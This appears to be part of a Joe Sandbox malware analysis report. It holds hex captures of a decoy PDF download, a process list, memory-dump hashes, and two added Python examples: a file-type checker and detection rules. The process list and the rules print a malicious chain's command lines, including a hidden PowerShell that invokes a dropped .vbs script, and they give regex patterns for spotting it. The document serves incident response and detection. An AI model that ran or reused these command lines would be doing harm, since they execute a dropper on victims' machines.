                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 00 3f 00 c0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66
                                                                                            Data Ascii: C?"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdef
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: 42 63 f6 91 ac 1c 27 a7 50 cf 3e 4d fa d1 56 75 d0 ba c5 64 81 1a e6 4c e6 58 0c d5 26 8d 98 fa 33 16 57 24 7e ce 0d 4d b4 4e e0 f1 9d a4 83 d6 ad f8 85 85 a3 92 91 35 88 bd 03 2b 42 68 57 83 ca 8b eb 0a 26 10 84 26 17 0f 24 e1 b0 a4 2a f0 34 91 e7 9e c9 ab bc 37 82 b3 3c e6 68 87 ab e0 87 8c 95 38 94 3f 89 f6 74 69 2e 63 10 88 29 1a de d4 82 08 7f 0f d5 a4 1b 8d 61 79 c7 6f 9d e0 37 4a 89 38 17 e9 e4 95 dd 0d 7d 4f b3 30 56 d1 0f 1c 57 76 69 e3 4b 9b 0b d3 f3 e3 1a d9 e4 26 c2 70 53 39 67 76 0d 9f 1c f4 20 16 3a db 45 1d c7 b7 5c d1 9f 30 3d 72 3f aa ba 3c 22 fd 70 1b 45 03 b3 43 32 bf d8 82 1f e4 4f 1d 0f 11 35 f9 12 53 6d 59 4a 7b 27 f0 ef 43 32 e2 85 41 65 c5 a3 51 82 27 2e 9e 0e 45 46 7d 6b 32 7c 43 4a 16 e0 ee b0 58 c2 df 44 9e b6 f4 11 a9 53 55 b4
                                                                                            Data Ascii: Bc'P>MVudLX&3W$~MN5+BhW&&$*47<h8?ti.c)ayo7J8}O0VWviK&pS9gv :E\0=r?<"pEC2O5SmYJ{'C2AeQ'.EF}k2|CJXDSU
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: 74 f9 ed f0 78 28 61 e2 0c 41 23 be 47 c9 59 95 29 28 4a 96 a2 02 52 09 24 ec 00 dc c5 44 80 24 ab 2e a9 da ee 77 e0 9a 05 5c 51 a7 2a 92 c8 9b b9 49 6d 4e a7 8a f6 e9 c5 d7 a7 b6 18 47 ea ce ed 40 04 cf 01 f3 af 70 ac 7e 19 60 04 e7 fb fc 28 5c f7 6a 0c bd 93 ae 4b d1 0d 4e 58 cd 4c 14 a5 08 0f 37 7b ab 41 a5 ef bf 9e dc af 16 60 b0 e3 3d cc 6d 0b 4d 78 5b f6 55 58 87 e9 b5 ae 24 43 a0 f2 93 9f 94 3c 96 c3 d2 aa 72 d5 79 26 67 a5 16 16 cb e8 4a d2 52 6e 2c a1 71 af 3b f2 f6 c1 ec 38 6e 2d 22 14 58 f0 f1 23 fd e5 9c 2c 8c 41 4d 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 fc 3b 1b 6f 63 68 e3 ac 79 1f 65 d1 71 36 91 2b c0 4f f8 ab 4a e2 aa 9c d4 9c 85 04 4d ad 6f 39 c0 13 2e 16 4e a7 84 7e e7 98 f1 f5 eb 18
                                                                                            Data Ascii: tx(aA#GY)(JR$D$.w\Q*ImNG@p~`(\jKNXL7{A`=mMx[UX$C<ry&gJRn,q;8n-"X#,AM H"AD$ H"AD$ H";ochyeq6+OJMo9.N~
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: e4 47 fa 93 f1 82 27 78 df fe 44 7f a9 3f 18 22 fa 04 1d 41 04 75 06 f0 45 fb 04 48 22 41 12 08 90 44 82 24 11 20 89 04 51 dc 55 50 99 a6 50 a7 e7 25 10 5c 7d 96 1c 5b 69 4e a7 89 29 24 73 07 d9 ee de 08 bc 08 cf be dc 5d a0 f0 56 33 a8 d2 a8 18 6e a5 31 26 cc cb a8 6d 6d b0 f2 92 52 95 90 08 e1 04 6d ee 1e b8 22 a2 7f c4 57 b5 07 f4 9d 57 ea d3 1f 82 08 9f e2 2b da 83 fa 4e ab f5 69 8f c1 04 4f f1 15 ed 41 fd 27 55 fa b4 c7 e0 82 27 f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 16 5a 8b ff 00 10 4e d3 b5 39 e6 a5 1c c2 d5 54 25 c5 24 15 7c 9e 60 68 4d b7 29 02 08 a5 d8 bb b7 0f 69 7c 3e d3 2f cb e1 ba a3 a5 c4 05 10 18 7c f2 3a 58 03 b5 fa 0f 3e a4 55 df f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 13 fc 45 7b 50 7f 49 d5 7e ad 31 f8 20 89 fe 22 bd a8 3f a4 ea bf 56 98 fc
                                                                                            Data Ascii: G'xD?"AuEH"AD$ QUPP%\}[iN)$s]V3n1&mmRm"WW+NiOA'U'ZcAZN9T%$|`hM)i|>/|:X>UZcAE{PI~1 "?V
                                                                                            2024-12-19 11:48:25 UTC16384INData Raw: 65 4a 6b 65 99 59 69 a6 d1 2e 92 09 42 56 9d 76 36 de de ee 91 3f a8 5c e0 5f 5b 77 e3 3c 3f c5 d2 61 a4 01 53 f1 61 dd 5d 12 d9 1d 42 6b 0c 37 40 71 c6 94 df 77 c2 a0 a5 a4 83 70 01 dc f3 3e be 57 b4 31 5f be e0 40 10 00 be 7d bd b9 8a 65 3d 97 15 d8 04 b8 5c 83 c0 88 f9 a2 a4 2b 1d 8b 70 55 46 a6 cd 41 29 97 42 d0 b0 b5 5b 80 5f 5b f5 d6 e0 ef 6f 2d 74 8e 37 10 b5 e5 c3 3c b9 5b ad bc 99 96 36 33 b1 a6 69 37 fc a9 0a 7b 33 ca 4a 38 c3 12 33 68 6e 4d 01 21 68 4a 85 ac 39 1b 5b 71 ef bd b4 b4 0e 21 79 fb e4 89 91 a0 a1 1c ce 53 6f 85 43 bf ac 34 41 f2 de 4d 55 e1 86 b2 e5 9c 31 26 d4 b4 84 cb 69 03 84 2c 85 01 73 a7 4d 2d e0 7a f2 8e e2 62 17 d2 c3 f7 3f ee aa b0 cb 9a 6f 47 0d 3c 8c a4 4d 57 1e 62 e5 7c 8e 39 a1 2a 4a 69 e6 94 e7 00 40 5f 12 7f 7a da eb
                                                                                            Data Ascii: eJkeYi.BVv6?\_[w<?aSa]Bk7@qwp>W1_@}e=\+pUFA)B[_[o-t7<[63i7{3J83hnM!hJ9[q!ySoC4AMU1&i,sM-zb?oG<MWb|9*Ji@_z
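
The response above is the download of the decoy document that Acrobat opens later in the process list (content-type application/pdf, 871324 bytes, body starting 25 50 44 46 2d = "%PDF-"). The following is an added example, not part of the Joe Sandbox report or of the sample: it parses the header block and the "Data Raw" hex dump in the form the report prints them, decodes the captured bytes, and compares the declared content-type and content-length against what was actually captured, which is the check a responder runs when a "PDF" might really be a PE or an archive. The header block and the hex excerpt are copied from the response above (the excerpt is cut to its first 16 bytes); the MAGIC table is the example's own assumption.

```python
import re
from typing import Dict, List, Optional

# Header block of the response shown above, copied from the report.
RESPONSE_HEADERS = """HTTP/1.1 200 OK
Connection: close
content-type: application/pdf
last-modified: Sun, 28 Jan 2024 19:03:01 GMT
accept-ranges: bytes
content-length: 871324
date: Thu, 19 Dec 2024 11:48:24 GMT
server: LiteSpeed"""

# First "Data Raw" line of the body as the report prints it, cut to its first
# 16 bytes for this example (the report's chunk is 16384 bytes).
DATA_RAW_CHUNKS = [
    "Data Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a",
]

# File signatures worth distinguishing when a "document" download might really
# be something else (assumed table for this example, not from the report).
MAGIC = {
    b"%PDF-": "application/pdf",
    b"MZ": "application/x-msdownload",  # PE executable or DLL
    b"PK\x03\x04": "application/zip",   # also OOXML Office files
}


def parse_headers(block: str) -> Dict[str, str]:
    """Parse 'Name: value' lines after the status line; names are case-insensitive."""
    headers: Dict[str, str] = {}
    for line in block.splitlines()[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def decode_data_raw(line: str) -> bytes:
    """Turn a report 'Data Raw: 25 50 ...' line back into bytes."""
    hexpart = line.split("Data Raw:", 1)[1]
    return bytes.fromhex(re.sub(r"\s+", "", hexpart))


def sniff(body: bytes) -> Optional[str]:
    """Return the MIME type implied by the leading bytes, or None if unknown."""
    for magic, mime in MAGIC.items():
        if body.startswith(magic):
            return mime
    return None


def check_download(header_block: str, chunks: List[str]) -> dict:
    """Compare what the server declared with what the capture actually contains."""
    headers = parse_headers(header_block)
    body = b"".join(decode_data_raw(c) for c in chunks)
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    sniffed = sniff(body)
    declared_len = int(headers.get("content-length", "0"))
    return {
        "declared_type": declared,
        "sniffed_type": sniffed,
        "type_mismatch": sniffed is not None and sniffed != declared,
        "declared_length": declared_len,
        "captured_bytes": len(body),
        "capture_complete": len(body) == declared_len,
    }


if __name__ == "__main__":
    for key, value in check_download(RESPONSE_HEADERS, DATA_RAW_CHUNKS).items():
        print(f"{key}: {value}")
```

On this capture the declared and sniffed types agree (application/pdf), so the file is a genuine document used as a decoy rather than a disguised executable; capture_complete is false only because a single chunk was decoded. A "PDF" whose first two bytes are MZ would set type_mismatch and is the case worth alerting on.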


                                                                                            Target ID:0
                                                                                            Start time:06:48:12
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1"
                                                                                            Imagebase:0x7ff741d30000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:06:48:12
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff75da10000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:06:48:14
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'"
                                                                                            Imagebase:0x7ff741d30000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:06:48:25
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                                                            Imagebase:0x7ff702560000
                                                                                            File size:5'641'176 bytes
                                                                                            MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:12
                                                                                            Start time:06:48:26
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                            Imagebase:0x7ff6c3ff0000
                                                                                            File size:3'581'912 bytes
                                                                                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:13
                                                                                            Start time:06:48:27
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                            Imagebase:0x7ff7b4ee0000
                                                                                            File size:55'320 bytes
                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:14
                                                                                            Start time:06:48:27
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1736,i,1938861957224451301,13168527261703212553,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                            Imagebase:0x7ff6c3ff0000
                                                                                            File size:3'581'912 bytes
                                                                                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false
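
The process list above shows the chain the report's Sigma hits refer to: a PowerShell started with -ExecutionPolicy unrestricted, a second hidden-window PowerShell that runs iex on a .vbs dropped under the Public profile, Acrobat opening a PDF from the Desktop as a decoy, and the BITS service host starting. The following detection logic is an added example, not part of the Joe Sandbox report: the command lines are the ones shown for Target IDs 0, 3, 11 and 13 (the "=iex" is reproduced as the report prints it), and the regexes approximate the report's "Change PowerShell Policies to an Insecure Level" and "Suspicious PowerShell Parameter Substring" signatures plus the iex-from-drop-directory pattern. PID 7272 is from the report; the other PIDs, the rule names and the severities are the example's own.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Set, Tuple


@dataclass
class ProcessEvent:
    """Minimal process-creation record (the fields a Sysmon EID 1 or 4688 event carries)."""
    pid: int
    image: str
    command_line: str


# Command lines copied from Target IDs 0, 3, 11 and 13 of the report. PID 7272 is
# the report's; 1001-1003 are placeholders for this example.
EVENTS: List[ProcessEvent] = [
    ProcessEvent(7272, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\KcKtHBkskI.ps1"'),
    ProcessEvent(1001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\idj34h.vbs'"'''),
    ProcessEvent(1002, r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
                 r'"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"'),
    ProcessEvent(1003, r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS"),
]

# PowerShell accepts abbreviated parameter names, so match the prefixes rather
# than the full spelling: -ep/-ex/-exec/-ExecutionPolicy and -w/-win/-WindowStyle.
INSECURE_POLICY = re.compile(r"(^|\s)-(ep|ex\w*)\s+(unrestricted|bypass)\b", re.I)
HIDDEN_WINDOW = re.compile(r"(^|\s)-w(in\w*)?\s+hidden\b", re.I)
IEX = re.compile(r"\b(iex|invoke-expression)\b", re.I)
DROP_DIR = re.compile(r"\b(public|temp|tmp|appdata|programdata)\b", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|hta|ps1|bat|cmd)\b", re.I)
BITS_SERVICE = re.compile(r"-s\s+BITS\b", re.I)
DESKTOP_DOC = re.compile(r"\\desktop\\[^\"]+\.(pdf|docx?|xlsx?)\b", re.I)


def image_is(e: ProcessEvent, *names: str) -> bool:
    """True when the image path ends in one of the given file names."""
    return e.image.lower().endswith(tuple("\\" + n for n in names))


def powershell_flags(e: ProcessEvent, *patterns: re.Pattern) -> bool:
    """True for a PowerShell process whose command line matches every pattern."""
    return image_is(e, "powershell.exe", "pwsh.exe") and all(p.search(e.command_line) for p in patterns)


# (rule name, severity, predicate). Names and severities are this example's own.
RULES: List[Tuple[str, str, Callable[[ProcessEvent], bool]]] = [
    ("powershell_insecure_execution_policy", "high",
     lambda e: powershell_flags(e, INSECURE_POLICY)),
    ("powershell_hidden_window", "medium",
     lambda e: powershell_flags(e, HIDDEN_WINDOW)),
    ("powershell_iex_script_from_drop_dir", "high",
     lambda e: powershell_flags(e, IEX, DROP_DIR, SCRIPT_EXT)),
    ("bits_service_started", "info",
     lambda e: image_is(e, "svchost.exe") and BITS_SERVICE.search(e.command_line) is not None),
    ("document_viewer_opened_desktop_file", "info",
     lambda e: image_is(e, "acrobat.exe", "acrord32.exe", "winword.exe", "excel.exe")
     and DESKTOP_DOC.search(e.command_line) is not None),
]


def evaluate(events: List[ProcessEvent]) -> List[dict]:
    """Run every rule over every event; one finding per (event, rule) hit."""
    return [{"pid": e.pid, "rule": name, "severity": sev}
            for e in events for name, sev, pred in RULES if pred(e)]


def pids_with_severity(findings: List[dict], severity: str) -> Set[int]:
    return {f["pid"] for f in findings if f["severity"] == severity}


if __name__ == "__main__":
    for f in evaluate(EVENTS):
        print(f"{f['severity']:6} pid={f['pid']:<5} {f['rule']}")
```

The two PowerShell events each trip a high-severity rule; the Acrobat and BITS events only add context, which is deliberate: a decoy document and a BITS start are common in benign sessions, and it is the hidden-window iex on a script under a user-writable directory that separates this chain from an administrator's script.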

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1518244303.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffaac670000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ?_H
                                                                                              • API String ID: 0-1095511010
                                                                                              • Opcode ID: d30a5f3ce1a8fbd17656e5a22fe60173a6d5f6eda933cfcf9a50b59dd9bf0c69
                                                                                              • Instruction ID: c80a6fe64160c34ef51e1c43e7a2edeeab91eabf20537b9c050e40a4adca1db2
                                                                                              • Opcode Fuzzy Hash: d30a5f3ce1a8fbd17656e5a22fe60173a6d5f6eda933cfcf9a50b59dd9bf0c69
                                                                                              • Instruction Fuzzy Hash: 44D1466190EB9A8FFBA6E76888159B97FD2EF46310B0855FAD04EC7093DD18D809C3D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1518244303.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffaac670000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ?_H
                                                                                              • API String ID: 0-1095511010
                                                                                              • Opcode ID: 0ded3fd9d02986259d6700131fb9534cdad0f1dc0e13d6c16e4b9e12d06b5c35
                                                                                              • Instruction ID: bacd31057e6c00408b3e7beb01a91fc6d7175590a1662ee6ae93b67a2b45a1f8
                                                                                              • Opcode Fuzzy Hash: 0ded3fd9d02986259d6700131fb9534cdad0f1dc0e13d6c16e4b9e12d06b5c35
                                                                                              • Instruction Fuzzy Hash: 3611E031A0E75A8FFB66DB9884806B86792EB4A302F1864FAC40EC3182D9259C498390
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1518244303.00007FFAAC670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC670000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffaac670000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d5b8eaf07efbd6151b95f6d583b47b71dce94720b6ce1b3af409c47b48267563
                                                                                              • Instruction ID: 125217d58a3712416f1f92ae46039165ebf4b077036e9d2d59c79829df30f59f
                                                                                              • Opcode Fuzzy Hash: d5b8eaf07efbd6151b95f6d583b47b71dce94720b6ce1b3af409c47b48267563
                                                                                              • Instruction Fuzzy Hash: 66213472E0EB5ACBF3A6D728485057867C2EF82310B69A8BAD01DC3993ED19DC094285
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1517603130.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_7ffaac5a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
• API String ID:
• Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
• Instruction ID: 17364a7ed5c721308ba304accf623cb31311e560d270a2ff844f7884f510332f
• Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
• Instruction Fuzzy Hash: 1D01A77010CB0C8FD744EF0CE051AA5B3E0FB99324F10052DE58AC3661DA32E882CB41
Strings
Memory Dump Source
• Source File: 00000000.00000002.1517603130.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffaac5a0000_powershell.jbxd
Similarity
• API ID:
• String ID: 8D*$@rJ$HI*$U*
• API String ID: 0-2489705372
• Opcode ID: 4f761e70dcb8e407cdcfd39c23e365732a9e7ea98703a8eeab156ab5026bc0e2
• Instruction ID: 7c2d29c8de7ffa07c2f009440db7504e0a50f043e3ad44a6b77f3ff922121c71
• Opcode Fuzzy Hash: 4f761e70dcb8e407cdcfd39c23e365732a9e7ea98703a8eeab156ab5026bc0e2
• Instruction Fuzzy Hash: AA2293A794F7C38FF3124B699C6A0E57FA4EF5362470941F7E0CC8A093E919580E87A1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1517603130.00007FFAAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffaac5a0000_powershell.jbxd
Similarity
• API ID:
• String ID: 8D*$@rJ$HI*$U*
• API String ID: 0-2489705372
• Opcode ID: 454706121f72a50ea2221933bf914e58df956e465e196503400453dd89e2eee8
• Instruction ID: 589be2d07c4a6d4591d03ba75dd78d6b049a2dd036249b4a515f336e21df79f6
• Opcode Fuzzy Hash: 454706121f72a50ea2221933bf914e58df956e465e196503400453dd89e2eee8
• Instruction Fuzzy Hash: 82D1B5A794F7C78FF3124B695C6A0E57FA4EF5366470941F7E0CC8A093E819580A87E1
Memory Dump Source
• Source File: 00000003.00000002.1319172365.00007FFAAC640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac640000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5690bc6ea5de5b619006f735620f1603f2d68515b23aea6507f1cf2a2baeedff
• Instruction ID: 736b450a9449b031c22d4fc55b2b4a7ccf24d5acf856c72e4105c406c1d464d3
• Opcode Fuzzy Hash: 5690bc6ea5de5b619006f735620f1603f2d68515b23aea6507f1cf2a2baeedff
• Instruction Fuzzy Hash: DAD1126291EBCA8FF797DB6C89555BA7FD1EF42210B1860BAD04DC7093ED18D8098391
Memory Dump Source
• Source File: 00000003.00000002.1318826594.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac570000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
• Instruction ID: bee303c1f4efc301387659d61f640e7d41f0dbd1056ec0066b2a57676e6cd883
• Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
• Instruction Fuzzy Hash: 9001677115CB0D8FD744EF0CE451AA5B7E0FB99364F10056DE58AC36A1DA36E882CB45
Strings
Memory Dump Source
• Source File: 00000003.00000002.1318826594.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac570000_powershell.jbxd
Similarity
• API ID:
• String ID: X]I$!P_^$@rJ$HI*
• API String ID: 0-953585876
• Opcode ID: b1c9abf69c2b9cfa5110cc378570c0f4f78c3017cf9c60471f604897547c4d2f
• Instruction ID: 7fcefa170b2ffa9825f5f0b6ea25ddb3be6aff875046ddf0bdcb885aa2c3eecf
• Opcode Fuzzy Hash: b1c9abf69c2b9cfa5110cc378570c0f4f78c3017cf9c60471f604897547c4d2f
• Instruction Fuzzy Hash: BED1A7A794E7E3DFF3125B685DA50E53F64EF5322470984F7E0C88A497E814988E83E1